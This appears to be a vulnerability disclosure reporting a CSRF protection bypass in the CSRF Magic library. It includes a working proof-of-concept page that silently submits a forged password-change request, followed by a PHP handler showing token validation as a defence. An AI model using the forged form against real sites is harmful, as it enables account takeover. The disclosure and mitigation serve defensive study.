ghost_fh

CSRF Magic Library

Nov 14th, 2019
Issue:- CSRF vulnerability.

Vulnerability Description :- CSRF Magic is vulnerable to a CSRF protection bypass. A remote attacker can exploit this flaw by crafting a malicious page and distributing it to the victim through social engineering, enticing them to click the link. Once the user/victim clicks the `try again` button, the attacker can take over the account and perform unintended actions on the victim's behalf.

Steps to Reproduce :-
1. Create a malicious page containing the values below.

<!DOCTYPE html>
<html>
<!-- onload submits the hidden form below as soon as the page is opened -->
<body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
<form id="myForm" action="https://target.com/password_change.php" method="POST">
<input type="hidden" name="password" value="secret">
<input type="hidden" name="conformed_password" value="secret">
</form>
</body>
</html>

2. Once the "Try again" button is clicked, the attack is executed by requesting a password change.
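
A defensive counterpart to the steps above, as an added example that is not part of the original paste and is not csrf-magic's own code: a `password_change.php`-style handler that fails closed when the CSRF token is missing or wrong and discards the rejected fields, so a retry starts from a fresh form instead of re-sending the forged body. The `csrf_token` and `current_password` fields, the session layout and the function names are assumptions made for the example.

```php
<?php
// Added example, not csrf-magic's code. Field and function names are assumed.

// Issue (or reuse) the per-session token embedded in the legitimate form.
function csrf_token(array &$session): string {
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Constant-time check; a missing or non-string token counts as a failure.
function csrf_valid(array $session, array $post): bool {
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent) && !empty($session['csrf'])
        && hash_equals($session['csrf'], $sent);
}

// Hypothetical handler for the page's password_change.php endpoint.
function handle_password_change(array &$session, array $post): array {
    if (!csrf_valid($session, $post)) {
        // Fail closed and drop the submitted fields: a retry must start from
        // a freshly rendered form, so a forged body is never re-sent.
        return ['status' => 403, 'action' => 'render_empty_form'];
    }
    $new = $post['password'] ?? '';
    $confirm = $post['conformed_password'] ?? '';
    if (!is_string($new) || $new === '' || $new !== $confirm) {
        return ['status' => 400, 'action' => 'render_empty_form'];
    }
    // Defence in depth (assumption): also require the current password.
    $current = $post['current_password'] ?? '';
    if (!is_string($current) || !password_verify($current, $session['pw_hash'])) {
        return ['status' => 403, 'action' => 'render_empty_form'];
    }
    $session['pw_hash'] = password_hash($new, PASSWORD_DEFAULT);
    return ['status' => 200, 'action' => 'password_changed'];
}

// Constructed sample data: one logged-in session and two requests.
$session = ['pw_hash' => password_hash('old-pass', PASSWORD_DEFAULT)];
$token = csrf_token($session);
$forged = ['password' => 'secret', 'conformed_password' => 'secret'];
$legit = $forged + ['csrf_token' => $token, 'current_password' => 'old-pass'];
print_r(handle_password_change($session, $forged));
print_r(handle_password_change($session, $legit));
```

The first call carries only the two fields from the cross-site form and is refused before any password logic runs; the second carries the session's token and the current password.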